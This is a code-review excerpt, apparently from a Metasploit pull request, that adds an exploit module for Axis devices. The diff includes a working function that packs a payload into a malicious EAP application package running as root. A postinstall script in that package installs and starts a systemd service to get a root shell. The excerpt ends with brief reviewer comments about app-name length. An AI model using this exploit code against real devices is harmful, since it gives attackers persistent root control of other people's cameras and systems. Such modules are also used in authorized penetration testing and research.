modules/exploits/linux/http/axis_app_install.rb

```diff
@@ -0,0 +1,254 @@
+  # create and execute a new service for the payload. We have to d this because the oneshot
+  # child processes will be reaped when the main binary exits. Executing the payload from
+  # a new service gets around that issue.
+  #
+  # The eap registers as a "lua" apptype, because the binary version (armv7hf) gets checked
+  # for some required libraries whereas the lua version is just accepted.
+  #
+  # The construction of the eap follows this pattern:
+  # * tar -cf exploit payload package.conf postinstall.sh payload.service
+  # * gzip exploit
+  # * mv exploit.gz exploit.eap
+  def create_eap(payload, appname)
+    print_status("Creating an application package named: #{appname}")
+    script_name = "#{Rex::Text.rand_text_alpha_lower(2..4)}.sh"
+
+    package_conf = "PACKAGENAME='#{Rex::Text.rand_text_alpha(4..14)}'\n" \
+      "APPTYPE='lua'\n" \
+      "APPNAME='#{appname}'\n" \
+      "APPID='48#{Rex::Text.rand_text_numeric(3)}'\n" \
+      "APPMAJORVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
+      "APPMINORVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
+      "APPMICROVERSION='#{Rex::Text.rand_text_numeric(1)}'\n" \
+      "APPGRP='root'\n" \
+      "APPUSR='root'\n" \
+      "POSTINSTALLSCRIPT='#{script_name}'\n" \
+      "STARTMODE='respawn'\n"
+
+    # this sync, sleep, cp, sleep pattern is not optimal, but the underlying
+    # filesystem was taking time to catch up to the exploit (and mounting and
+    # unmounting itself which is just weird) and this seemed like a reasonable,
+    # if not hacky, way to give it a chance to catch up. Seems to work well.
+    start_service =
+      "#!/bin/sh\n"\
+      "\nsync\n"\
+      "\nsleep 2\n"\
+      "\ncp ./#{appname}.service /etc/systemd/system/\n" \
+      "\nsleep 2\n"\
+      "\nsystemctl start #{appname}\n"
+
+    # only register the service file for deletion. Everything else will be
+    # deleted by the uninstall function called later.
+    register_file_for_cleanup("/etc/systemd/system/#{appname}.service")
+
+    service =
+      "[Unit]\n"\
+      "Description=\n"\
+      "[Service]\n"\
+      "Type=simple\n"\
+      "User=root\n"\
+      "ExecStart=/usr/local/packages/#{appname}/#{appname}\n"\
+      "\n"\
+      "[Install]\n"\
+      "WantedBy=multi-user.target\n"
+
+    tarfile = StringIO.new
+    Rex::Tar::Writer.new tarfile do |tar|
+      tar.add_file('package.conf', 0o644) do |io|
+        io.write package_conf
+      end
+      tar.add_file(script_name.to_s, 0o755) do |io|
+        io.write start_service
+      end
+      tar.add_file(appname.to_s, 0o755) do |io|
+        io.write payload
+      end
+      tar.add_file("#{appname}.service", 0o644) do |io|
+        io.write service
+      end
+    end
+    tarfile.rewind
+    tarfile.close
+
+    Rex::Text.gzip(tarfile.string)
+  end
+
+  # Upload the malicious EAP application for a root shell. Always attempt to uninstall the application
+  def exploit
+    appname = Rex::Text.rand_text_alpha_lower(3)
```

Comment:
I think we can make this a range at the very least (1..3). Also not sure if limiting this to 3 characters when this could be longer?

Reply:
The official apps I looked at use 3 letters. I don't see a reason deviate 🤷

Reply:
no problem that makes sense, marking resolved.